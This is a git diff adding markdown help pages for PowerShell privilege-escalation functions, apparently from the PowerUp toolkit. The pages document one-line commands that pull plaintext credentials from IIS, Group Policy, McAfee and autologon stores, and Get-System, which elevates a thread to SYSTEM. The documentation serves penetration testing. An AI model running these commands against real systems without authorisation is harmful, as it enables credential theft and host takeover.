b/docs/Privesc/Get-ApplicationHost.md new file mode 100755 index 0000000..44d07d7 --- /dev/null +++ b/docs/Privesc/Get-ApplicationHost.md 
@@ -0,0 +1,95 @@ +# Get-ApplicationHost + +## SYNOPSIS +Recovers encrypted application pool and virtual directory passwords from the applicationHost.config on the system. + +Author: Scott Sutherland +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ApplicationHost +``` + +## DESCRIPTION +This script will decrypt and recover application pool and virtual directory passwords +from the applicationHost.config file on the system. +The output supports the +pipeline which can be used to convert all of the results into a pretty table by piping +to format-table. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Return application pool and virtual directory passwords from the applicationHost.config on the system. +``` + +Get-ApplicationHost + +user : PoolUser1 +pass : PoolParty1! +type : Application Pool +vdir : NA +apppool : ApplicationPool1 +user : PoolUser2 +pass : PoolParty2! +type : Application Pool +vdir : NA +apppool : ApplicationPool2 +user : VdirUser1 +pass : VdirPassword1! +type : Virtual Directory +vdir : site1/vdir1/ +apppool : NA +user : VdirUser2 +pass : VdirPassword2! +type : Virtual Directory +vdir : site2/ +apppool : NA + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Return a list of cleartext and decrypted connect strings from web.config files. +``` + +Get-ApplicationHost | Format-Table -Autosize + +user pass type vdir apppool +---- ---- ---- ---- ------- +PoolUser1 PoolParty1! +Application Pool NA ApplicationPool1 +PoolUser2 PoolParty2! +Application Pool NA ApplicationPool2 +VdirUser1 VdirPassword1! +Virtual Directory site1/vdir1/ NA +VdirUser2 VdirPassword2! 
+Virtual Directory site2/ NA + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Data.DataTable + +System.Boolean + +## NOTES +Author: Scott Sutherland - 2014, NetSPI +Version: Get-ApplicationHost v1.0 +Comments: Should work on IIS 6 and Above + +## RELATED LINKS + +[https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx](https://github.com/darkoperator/Posh-SecMod/blob/master/PostExploitation/PostExploitation.psm1 +http://www.netspi.com +http://www.iis.net/learn/get-started/getting-started-with-iis/getting-started-with-appcmdexe +http://msdn.microsoft.com/en-us/library/k6h9cz8h(v=vs.80).aspx) + diff --git a/docs/Privesc/Get-CachedGPPPassword.md b/docs/Privesc/Get-CachedGPPPassword.md new file mode 100755 index 0000000..2169a15 --- /dev/null +++ b/docs/Privesc/Get-CachedGPPPassword.md 
@@ -0,0 +1,55 @@ +# Get-CachedGPPPassword + +## SYNOPSIS +Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences and +left in cached files on the host. + +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-CachedGPPPassword +``` + +## DESCRIPTION +Get-CachedGPPPassword searches the local machine for cached for groups.xml, scheduledtasks.xml, services.xml and +datasources.xml files and returns plaintext passwords. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-CachedGPPPassword +``` + +NewName : \[BLANK\] +Changed : {2013-04-25 18:36:07} +Passwords : {Super!!!Password} +UserNames : {SuperSecretBackdoor} +File : C:\ProgramData\Microsoft\Group Policy\History\{32C4C89F-7 + C3A-4227-A61D-8EF72B5B9E42}\Machine\Preferences\Groups\Gr + oups.xml + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html](http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html +https://github.com/mattifestation/PowerSploit/blob/master/Recon/Get-GPPPassword.ps1 +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/gpp.rb +http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences +http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html) + 
diff --git a/docs/Privesc/Get-ModifiablePath.md b/docs/Privesc/Get-ModifiablePath.md new file mode 100755 index 0000000..2a1118f --- /dev/null +++ b/docs/Privesc/Get-ModifiablePath.md 
@@ -0,0 +1,102 @@ +# Get-ModifiablePath + +## SYNOPSIS +Parses a passed string containing multiple possible file/folder paths and returns +the file paths where the current user has modification rights. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ModifiablePath [-Path] [-Literal] +``` + +## DESCRIPTION +Takes a complex path specification of an initial file/folder path with possible +configuration files, 'tokenizes' the string in a number of possible ways, and +enumerates the ACLs for each path that currently exists on the system. +Any path that +the current user has modification rights on is returned in a custom object that contains +the modifiable path, associated permission set, and the IdentityReference with the specified +rights. +The SID of the current user and any group he/she are a part of are used as the +comparison set against the parsed path DACLs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +'"C:\Temp\blah.exe" -f "C:\Temp\config.ini"' | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Temp\blah.exe {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Temp\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ChildItem C:\Vuln\ -Recurse | Get-ModifiablePath +``` + +Path Permissions IdentityReference +---- ----------- ----------------- +C:\Vuln\blah.bat {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +C:\Vuln\config.ini {ReadAttributes, ReadCo... +NT AUTHORITY\Authentic... +... + +## PARAMETERS + +### -Path +The string path to parse for modifiable files. 
+Required + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: FullName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Literal +Switch. +Treat all paths as literal (i.e. +don't do 'tokenization'). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: LiteralPaths + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenPrivilege.ModifiablePath + +Custom PSObject containing the Permissions, ModifiablePath, IdentityReference for +a modifiable path. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableRegistryAutoRun.md b/docs/Privesc/Get-ModifiableRegistryAutoRun.md new file mode 100755 index 0000000..23314f9 --- /dev/null +++ b/docs/Privesc/Get-ModifiableRegistryAutoRun.md @@ -0,0 +1,44 @@ +# Get-ModifiableRegistryAutoRun + +## SYNOPSIS +Returns any elevated system autoruns in which the current user can +modify part of the path string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableRegistryAutoRun +``` + +## DESCRIPTION +Enumerates a number of autorun specifications in HKLM and filters any +autoruns through Get-ModifiablePath, returning any file/config locations +in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableRegistryAutoRun +``` + +Return vulneable autorun binaries (or associated configs). + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableRegistryAutoRun + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableScheduledTaskFile.md b/docs/Privesc/Get-ModifiableScheduledTaskFile.md new file mode 100755 index 0000000..4e48cc4 
--- /dev/null +++ b/docs/Privesc/Get-ModifiableScheduledTaskFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableScheduledTaskFile + +## SYNOPSIS +Returns scheduled tasks where the current user can modify any file +in the associated task action string. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableScheduledTaskFile +``` + +## DESCRIPTION +Enumerates all scheduled tasks by recursively listing "$($ENV:windir)\System32\Tasks" +and parses the XML specification for each task, extracting the command triggers. +Each trigger string is filtered through Get-ModifiablePath, returning any file/config +locations in the found path strings that the current user can modify. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableScheduledTaskFile +``` + +Return scheduled tasks with modifiable command strings. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiableScheduledTaskFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableService.md b/docs/Privesc/Get-ModifiableService.md new file mode 100755 index 0000000..92eeb81 --- /dev/null +++ b/docs/Privesc/Get-ModifiableService.md 
@@ -0,0 +1,40 @@ +# Get-ModifiableService + +## SYNOPSIS +Enumerates all services and returns services for which the current user can modify the binPath. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ServiceDetail + +## SYNTAX + +``` +Get-ModifiableService +``` + +## DESCRIPTION +Enumerates all services using Get-Service and uses Test-ServiceDaclPermission to test if +the current user has rights to change the service configuration. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableService +``` + +Get a set of potentially exploitable services. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ModifiableServiceFile.md b/docs/Privesc/Get-ModifiableServiceFile.md new file mode 100755 index 0000000..ab01e42 --- /dev/null +++ b/docs/Privesc/Get-ModifiableServiceFile.md @@ -0,0 +1,45 @@ +# Get-ModifiableServiceFile + +## SYNOPSIS +Enumerates all services and returns vulnerable service files. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Test-ServiceDaclPermission, Get-ModifiablePath + +## SYNTAX + +``` +Get-ModifiableServiceFile +``` + +## DESCRIPTION +Enumerates all services by querying the WMI win32_service class. +For each service, +it takes the pathname (aka binPath) and passes it to Get-ModifiablePath to determine +if the current user has rights to modify the service binary itself or any associated +arguments. +If the associated binary (or any configuration files) can be overwritten, +privileges may be able to be escalated. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ModifiableServiceFile +``` + +Get a set of potentially exploitable service binares/config files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.ModifiablePath + +## NOTES + +## RELATED LINKS + 
diff --git a/docs/Privesc/Get-ProcessTokenGroup.md b/docs/Privesc/Get-ProcessTokenGroup.md new file mode 100755 index 0000000..e52533c --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenGroup.md 
@@ -0,0 +1,114 @@ +# Get-ProcessTokenGroup + +## SYNOPSIS +Returns all SIDs that the current token context is a part of, whether they are disabled or not. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenGroup [[-Id] ] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current token groups for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 1372 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 1372 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 1372 +S-1-16-8192 1372 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenGroup +``` + +SID Attributes ProcessId +--- ---------- --------- +S-1-5-21-890171859-3433809... 
+..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-1-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-32-544 SE_GROUP_USE_FOR_DENY_ONLY 2640 +S-1-5-32-545 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-4 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-2-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-11 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-15 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-5-0-419601 ...SE_GROUP_INTEGRITY_ENABLED 2640 +S-1-2-0 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-5-21-890171859-3433809... +..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-18-1 ..._DEFAULT, SE_GROUP_ENABLED 2640 +S-1-16-8192 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-ProcessTokenPrivilege.md b/docs/Privesc/Get-ProcessTokenPrivilege.md new file mode 100755 index 0000000..9f835f2 --- /dev/null +++ b/docs/Privesc/Get-ProcessTokenPrivilege.md 
@@ -0,0 +1,131 @@ +# Get-ProcessTokenPrivilege + +## SYNOPSIS +Returns all privileges for the current (or specified) process ID. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Get-TokenInformation + +## SYNTAX + +``` +Get-ProcessTokenPrivilege [[-Id] ] [-Special] +``` + +## DESCRIPTION +First, if a process ID is passed, then the process is opened using OpenProcess(), +otherwise GetCurrentProcess() is used to open up a pseudohandle to the current process. +OpenProcessToken() is then used to get a handle to the specified process token. +The token +is then passed to Get-TokenInformation to query the current privileges for the specified +token. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ProcessTokenPrivilege +``` + +Privilege Attributes ProcessId + --------- ---------- --------- + SeShutdownPrivilege DISABLED 2600 + SeChangeNotifyPrivilege ...AULT, SE_PRIVILEGE_ENABLED 2600 + SeUndockPrivilege DISABLED 2600 +SeIncreaseWorkingSetPrivilege DISABLED 2600 + SeTimeZonePrivilege DISABLED 2600 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ProcessTokenPrivilege -Special +``` + +Privilege Attributes ProcessId +--------- ---------- --------- +SeSecurityPrivilege DISABLED 2444 +SeTakeOwnershipPrivilege DISABLED 2444 +SeBackupPrivilege DISABLED 2444 +SeRestorePrivilege DISABLED 2444 +SeSystemEnvironmentPriv... 
+DISABLED 2444 +SeImpersonatePrivilege ...T, SE_PRIVILEGE_ENABLED 2444 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-Process notepad | Get-ProcessTokenPrivilege | fl +``` + +Privilege : SeShutdownPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeChangeNotifyPrivilege +Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED +ProcessId : 2640 + +Privilege : SeUndockPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeIncreaseWorkingSetPrivilege +Attributes : DISABLED +ProcessId : 2640 + +Privilege : SeTimeZonePrivilege +Attributes : DISABLED +ProcessId : 2640 + +## PARAMETERS + +### -Id +The process ID to enumerate token groups for, otherwise defaults to the current process. + +```yaml +Type: UInt32 +Parameter Sets: (All) +Aliases: ProcessID + +Required: False +Position: 1 +Default value: 0 +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Special +Switch. +Only return 'special' privileges, meaning admin-level privileges. +These include SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, +SeRestorePrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeImpersonatePrivilege, SeTcbPrivilege. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: Privileged + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.TokenGroup + +Outputs a custom object containing the token group (SID/attributes) for the specified token if +"-InformationClass 'Groups'" is passed. + +PowerUp.TokenPrivilege + +Outputs a custom object containing the token privilege (name/attributes) for the specified token if +"-InformationClass 'Privileges'" is passed + +## NOTES + +## RELATED LINKS + 
diff --git a/docs/Privesc/Get-RegistryAlwaysInstallElevated.md b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md new file mode 100755 index 0000000..ff48afc --- /dev/null +++ b/docs/Privesc/Get-RegistryAlwaysInstallElevated.md @@ -0,0 +1,45 @@ +# Get-RegistryAlwaysInstallElevated + +## SYNOPSIS +Checks if any of the AlwaysInstallElevated registry keys are set. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAlwaysInstallElevated +``` + +## DESCRIPTION +Returns $True if the HKLM:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated +or the HKCU:SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated keys +are set, $False otherwise. +If one of these keys are set, then all .MSI files run with +elevated permissions, regardless of current user permissions. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAlwaysInstallElevated +``` + +Returns $True if any of the AlwaysInstallElevated registry keys are set. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### System.Boolean + +$True if RegistryAlwaysInstallElevated is set, $False otherwise. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-RegistryAutoLogon.md b/docs/Privesc/Get-RegistryAutoLogon.md new file mode 100755 index 0000000..b93e75c --- /dev/null +++ b/docs/Privesc/Get-RegistryAutoLogon.md 
@@ -0,0 +1,44 @@ +# Get-RegistryAutoLogon + +## SYNOPSIS +Finds any autologon credentials left in the registry. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-RegistryAutoLogon +``` + +## DESCRIPTION +Checks if any autologon accounts/credentials are set in a number of registry locations. +If they are, the credentials are extracted and returned as a custom PSObject. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-RegistryAutoLogon +``` + +Finds any autologon credentials left in the registry. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.RegistryAutoLogon + +Custom PSObject containing autologin credentials found in the registry. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/windows_autologin.rb) + diff --git a/docs/Privesc/Get-ServiceDetail.md b/docs/Privesc/Get-ServiceDetail.md new file mode 100755 index 0000000..ac758b0 --- /dev/null +++ b/docs/Privesc/Get-ServiceDetail.md 
@@ -0,0 +1,65 @@ +# Get-ServiceDetail + +## SYNOPSIS +Returns detailed information about a specified service by querying the +WMI win32_service class for the specified service name. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-ServiceDetail [-Name] +``` + +## DESCRIPTION +Takes an array of one or more service Names or ServiceProcess.ServiceController objedts on +the pipeline object returned by Get-Service, extracts out the service name, queries the +WMI win32_service class for the specified service for details like binPath, and outputs +everything. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ServiceDetail -Name VulnSVC +``` + +Gets detailed information about the 'VulnSVC' service. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-Service VulnSVC | Get-ServiceDetail +``` + +Gets detailed information about the 'VulnSVC' service. + +## PARAMETERS + +### -Name +An array of one or more service names to query information for. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: ServiceName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.ManagementObject + +## NOTES + +## RELATED LINKS + diff --git a/docs/Privesc/Get-SiteListPassword.md b/docs/Privesc/Get-SiteListPassword.md new file mode 100755 index 0000000..1ebbb5b --- /dev/null +++ b/docs/Privesc/Get-SiteListPassword.md 
@@ -0,0 +1,96 @@ +# Get-SiteListPassword + +## SYNOPSIS +Retrieves the plaintext passwords for found McAfee's SiteList.xml files. +Based on Jerome Nokin (@funoverip)'s Python solution (in links). + +Author: Jerome Nokin (@funoverip) +PowerShell Port: @harmj0y +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-SiteListPassword [[-Path] ] +``` + +## DESCRIPTION +Searches for any McAfee SiteList.xml in C:\Program Files\, C:\Program Files (x86)\, +C:\Documents and Settings\, or C:\Users\. +For any files found, the appropriate +credential fields are extracted and decrypted using the internal Get-DecryptedSitelistPassword +function that takes advantage of McAfee's static key encryption. +Any decrypted credentials +are output in custom objects. +See links for more information. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-SiteListPassword +``` + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : +Path : Products/CommonUpdater +Name : McAfeeHttp +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : +Server : update.nai.com:80 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Paris +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : paris001 + +EncPassword : jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q== +UserName : McAfeeService +Path : Repository$ +Name : Tokyo +DecPassword : MyStrongPassword! +Enabled : 1 +DomainName : companydomain +Server : tokyo000 + +## PARAMETERS + +### -Path +Optional path to a SiteList.xml file or folder. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerUp.SiteListPassword + +## NOTES + +## RELATED LINKS + +[https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf](https://github.com/funoverip/mcafee-sitelist-pwd-decryption/ +https://funoverip.net/2016/02/mcafee-sitelist-xml-password-decryption/ +https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md +https://www.syss.de/fileadmin/dokumente/Publikationen/2011/SySS_2011_Deeg_Privilege_Escalation_via_Antivirus_Software.pdf) + diff --git a/docs/Privesc/Get-System.md b/docs/Privesc/Get-System.md new file mode 100755 index 0000000..bcaf3d6 --- /dev/null +++ b/docs/Privesc/Get-System.md 
@@ -0,0 +1,172 @@ +# Get-System + +## SYNOPSIS +GetSystem functionality inspired by Meterpreter's getsystem. +'NamedPipe' impersonation doesn't need SeDebugPrivilege but does create +a service, 'Token' duplications a SYSTEM token but needs SeDebugPrivilege. +NOTE: if running PowerShell 2.0, start powershell.exe with '-STA' to ensure +token duplication works correctly. + +PowerSploit Function: Get-System +Author: @harmj0y, @mattifestation +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### NamedPipe (Default) +``` +Get-System [-Technique ] [-ServiceName ] [-PipeName ] +``` + +### Token +``` +Get-System [-Technique ] +``` + +### RevToSelf +``` +Get-System [-RevToSelf] +``` + +### WhoAmI +``` +Get-System [-WhoAmI] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-System +``` + +Uses named impersonate to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-System -ServiceName 'PrivescSvc' -PipeName 'secret' +``` + +Uses named impersonate to elevate the current thread token to SYSTEM +with a custom service and pipe name. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-System -Technique Token +``` + +Uses token duplication to elevate the current thread token to SYSTEM. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-System -WhoAmI +``` + +Displays the credentials for the current thread. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-System -RevToSelf +``` + +Reverts the current thread privileges. + +## PARAMETERS + +### -Technique +The technique to use, 'NamedPipe' or 'Token'. 
+ +```yaml +Type: String +Parameter Sets: NamedPipe, Token +Aliases: + +Required: False +Position: Named +Default value: NamedPipe +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServiceName +The name of the service used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PipeName +The name of the named pipe used with named pipe impersonation, defaults to 'TestSVC'. + +```yaml +Type: String +Parameter Sets: NamedPipe +Aliases: + +Required: False +Position: Named +Default value: TestSVC +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RevToSelf +Reverts the current thread privileges. + +```yaml +Type: SwitchParameter +Parameter Sets: RevToSelf +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -WhoAmI +Switch. +Display the credentials for the current PowerShell thread. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: WhoAmI +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/](https://github.com/rapid7/meterpreter/blob/2a891a79001fc43cb25475cc43bced9449e7dc37/source/extensions/priv/server/elevate/namedpipe.c +https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot +http://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ +http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/) + diff --git a/docs/Privesc/Get-UnattendedInstallFile.md b/docs/Privesc/Get-UnattendedInstallFile.md new file mode 100755 index 0000000..8927520 --- /dev/null +++ b/docs/Privesc/Get-UnattendedInstallFile.md @@ -0,0 +1,44 @@ +# Get-UnattendedInstallFile + +## SYNOPSIS +Checks several locations for remaining unattended installation files, +which may have deployment credentials. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-UnattendedInstallFile +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-UnattendedInstallFile +``` + +Finds any remaining unattended installation files. + +## PARAMETERS + +## INPUTS + +## OUTPUTS + +### PowerUp.UnattendedInstallFile + +Custom PSObject containing results. + +## NOTES + +## RELATED LINKS + +[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html) + 
